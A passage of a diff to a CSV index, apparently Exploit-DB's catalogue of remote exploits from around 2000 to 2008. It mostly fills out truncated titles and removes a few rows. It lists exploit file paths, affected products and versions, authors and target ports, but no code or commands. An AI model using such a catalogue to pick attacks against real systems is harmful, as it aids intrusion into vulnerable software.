940,platforms/linux/remote/940.c,"Sumus 0.2.2 - HTTPd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 @@ -9669,21 +9683,21 @@ id,file,description,date,author,platform,type,port 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing - Buffer Overflow Universal (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 -1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote",2005-07-05,k-otik,windows,remote,0 +1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow",2005-07-05,k-otik,windows,remote,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",hardware,remote,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0 1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit",2005-07-10,"Soroush Dalili",windows,remote,0 1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation",2005-07-11,basher13,windows,remote,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution",2005-07-15,basher13,windows,remote,0 -1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote",2000-12-21,DiGiT,multiple,remote,5555 +1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Command Execution",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143 -1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote",2005-08-03,cybertronic,windows,remote,6070 +1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 -1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Overflow",2005-08-03,cybertronic,windows,remote,6070 +1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Remote Overflow",2005-08-03,cybertronic,windows,remote,6070 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 @@ -9700,8 +9714,8 @@ id,file,description,date,author,platform,type,port 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service (French) - Remote Universal (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 -1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote",2005-08-30,Lympex,multiple,remote,0 -1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote",2005-08-31,jpno5,windows,remote,6129 +1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Command Execution",2005-08-30,Lympex,multiple,remote,0 +1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow",2005-08-31,jpno5,windows,remote,6129 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,windows,remote,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 @@ -9720,9 +9734,9 @@ id,file,description,date,author,platform,type,port 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",osx,remote,13722 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode",2005-10-29,ATmaCA,windows,remote,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 @@ -9743,7 +9757,7 @@ id,file,description,date,author,platform,type,port 1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote,0 -1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote",2005-12-16,kingcope,windows,remote,105 +1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow",2005-12-16,kingcope,windows,remote,105 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Buffer Overflow",2005-12-19,muts,windows,remote,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 @@ -9861,7 +9875,7 @@ id,file,description,date,author,platform,type,port 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - 'GET' Arbitrary File Download",2006-10-24,prdelka,windows,remote,143 -2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote",2006-10-24,prdelka,hardware,remote,0 +2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access",2006-10-24,prdelka,hardware,remote,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User",2006-10-25,"Greg Linares",windows,remote,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 @@ -9881,11 +9895,10 @@ id,file,description,date,author,platform,type,port 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2809,platforms/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 -2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 -2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69 +2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - ActiveX Control Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 @@ -9965,17 +9978,17 @@ id,file,description,date,author,platform,type,port 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554 -3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote",2007-03-21,"Winny Thomas",windows,remote,143 +3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow",2007-03-21,"Winny Thomas",windows,remote,143 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 -3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Updates Remote",2007-03-22,"Andres Tarasco",windows,remote,0 +3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Update/Change",2007-03-22,"Andres Tarasco",windows,remote,0 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage",2007-03-23,"Jon Hart",multiple,remote,0 3561,platforms/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory (MS07-009)",2007-03-26,anonymous,windows,remote,0 -3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote",2007-03-26,"Winny Thomas",windows,remote,21 +3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow",2007-03-26,"Winny Thomas",windows,remote,21 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 @@ -9983,7 +9996,7 @@ id,file,description,date,author,platform,type,port 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote",2007-03-31,muts,windows,remote,143 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow",2007-03-31,muts,windows,remote,143 3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0 @@ -10042,11 +10055,11 @@ id,file,description,date,author,platform,type,port 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method",2007-05-30,shinnai,windows,remote,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - IMAP FLAGS Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0 -4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote",2007-05-31,rgod,windows,remote,0 +4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter)",2007-06-03,muts,windows,remote,8080 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,tru64,remote,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,windows,remote,0 @@ -10070,11 +10083,11 @@ id,file,description,date,author,platform,type,port 4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Buffer Overflow",2007-07-03,shinnai,windows,remote,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,windows,remote,5151 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - JOIN Response Remote Overwrite (SEH)",2007-07-06,h07,windows,remote,0 -4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()'",2007-07-06,shinnai,windows,remote,0 +4155,platforms/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write",2007-07-06,shinnai,windows,remote,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 -4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote",2007-07-08,Xpl017Elz,linux,remote,80 +4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow",2007-07-08,Xpl017Elz,linux,remote,80 4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray",2007-07-10,callAX,windows,remote,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray",2007-07-12,callAX,windows,remote,0 @@ -10113,7 +10126,7 @@ id,file,description,date,author,platform,type,port 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 -4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote",2007-08-28,shinnai,windows,remote,0 +4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Buffer Overflow",2007-08-28,rgod,windows,remote,0 @@ -10128,7 +10141,7 @@ id,file,description,date,author,platform,type,port 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow",2007-09-07,void,windows,remote,0 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 -4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote",2007-09-10,"Mattias Bengtsson",multiple,remote,0 +4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,windows,remote,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,windows,remote,0 @@ -10138,7 +10151,7 @@ id,file,description,date,author,platform,type,port 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,windows,remote,143 -4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote",2007-09-20,Andi,linux,remote,80 +4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Buffer Overflow",2007-09-23,rgod,windows,remote,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 @@ -10167,7 +10180,7 @@ id,file,description,date,author,platform,type,port 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command",2007-10-27,FistFuXXer,windows,remote,143 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,windows,remote,0 -4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote",2007-11-01,krafty,windows,remote,0 +4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution",2007-11-01,krafty,windows,remote,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method",2007-11-02,shinnai,windows,remote,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0 @@ -10197,7 +10210,7 @@ id,file,description,date,author,platform,type,port 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0 -4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overflow (SEH)",2008-01-08,Elazar,windows,remote,0 +4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Remote Overflow (SEH)",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0 @@ -10315,7 +10328,6 @@ id,file,description,date,author,platform,type,port 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 -6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote,0 @@ -10325,7 +10337,7 @@ id,file,description,date,author,platform,type,port 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 -6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote",2008-07-24,callAX,windows,remote,0 +6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,windows,remote,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 @@ -10347,7 +10359,7 @@ id,file,description,date,author,platform,type,port 6318,platforms/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution",2008-08-28,spdr,windows,remote,0 -6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote",2008-08-29,Andi,solaris,remote,0 